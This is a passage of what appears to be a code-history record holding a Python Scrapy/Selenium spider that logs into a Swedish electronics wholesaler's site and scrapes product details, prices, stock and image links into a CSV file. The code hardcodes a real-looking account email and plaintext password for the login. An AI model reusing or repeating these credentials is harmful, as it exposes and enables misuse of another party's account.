csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error3')\n for m in range(0, len(list4)):\n try:\n if list4[m] not in old_product_url:\n self.loggger.info('********************** ' + str(\n k) + ' ******************************')\n self.driver.get(list4[m])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading4 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock4 non-exist')\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price4 non-exist')\n csv_price_new = ''\n csv_price_old = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description4 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article number4 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image4 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list4[m] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error4')\n file.close()\n self.driver.close()\n",
"step-5": "import scrapy\nimport time\nimport os.path\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom tempfile import mkstemp\nfrom shutil import move\nfrom os import fdopen, remove\n\nfrom datetime import datetime\nimport logging\n\noutput_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')\nlog_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)\n\nclass ProductSpider(scrapy.Spider):\n name = \"tekniknet_new\"\n allowed_domains = ['www.tekniknet.se']\n start_urls = ['https://www.tekniknet.se/#']\n\n def __init__(self):\n # self.driver = webdriver.Chrome(\"./chromedriver.exe\")\n options = webdriver.ChromeOptions()\n # options.add_argument(\"--headless\")\n options.add_argument(\"--start-maximized\")\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n # Quiet down all the unnecessary logging. \n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n \n logging.getLogger('selenium.webdriver.remote.remote_connection').setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\n logging.getLogger('selenium.webdriver.remote.remote_connection').addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n # article_number_list = []\n csv_image_url = []\n # file_exist = False\n old_product_url = []\n \n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys(\"info@themobilestore.se\")\n username = self.driver.find_element_by_id('password')\n username.send_keys(\"order88\")\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n\n #Create temp file\n fh, abs_path = mkstemp()\n with fdopen(fh,'w') as new_file:\n with open(\"tekniknet.csv\") as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n #Remove original file\n remove(\"tekniknet.csv\")\n #Move new file\n move(abs_path, \"tekniknet.csv\")\n\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n\n file = open(\"tekniknet.csv\", \"a\", errors ='replace')\n # file.write('OLD/NEW' + ',' + 'article number' + ',' + 'category1' + ',' + 'category2' + ',' + 'category3' + ',' + 'heading' + ',' + 'description' + ',' + 'current price' + ',' + 'previous price' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'EAN code' + ',' + 'stock' + ',' + 'product url' + '\\n')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info('*************************************************')\n self.loggger.info(link1)\n\n for i in range(0, len(list1)-4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n self.loggger.info(link2)\n \n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))\n subcategory = self.driver.find_element_by_id('categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))\n subcategory = self.driver.find_element_by_id('categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath('.//a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id('breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath('.//li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = csv_categories2 + category2.text + '/'\n \n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name('listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\".//a\")\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n\n # for m in range(0, 5): IF YOU WANT TO DOWNLOAD CERTAIN PRODUCTS, YOU CAN WRITE LIKE THIS.\n # for m in range(0, len(list2)): IF YOU WANT TO DOWNLOAD ALL PRODUCTS, YOU CAN WRITE LIKE THIS.\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) + ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))\n\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))\n for wrapper3 in self.driver.find_elements_by_class_name('listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath(\".//a\")\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n self.loggger.info(link3)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n \n for k in range(0, len(list3)):\n try:\n if list3[k] not in old_product_url:\n self.loggger.info('----------------------- ' + str(k) + ' ******************************')\n self.driver.get(list3[k])\n WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))\n\n # breadcrumbs = self.driver.find_element_by_id('breadcrumbs')\n # categories = breadcrumbs.find_elements_by_xpath('.//a')\n # for category in categories:\n # csv_categories.append(category.text)\n\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading3 non-exist')\n csv_heading = ''\n\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock3 non-exist')\n csv_stock = ''\n\n try:\n price_new = offer.find_element_by_class_name('priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name('priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n \n price_old = offer.find_element_by_class_name('priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price3 non-exist')\n csv_price_old = ''\n csv_price_new = ''\n\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n except:\n self.loggger.info('description3 non-exist')\n csv_desc = ''\n\n try:\n article_number = offer.find_element_by_id('pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n except:\n self.loggger.info('article number3 non-exist')\n csv_article_number = ''\n \n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image3 non-exist')\n\n ######################################### CSV File Writing #########################################\n # if csv_article_number not in article_number_list:\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + 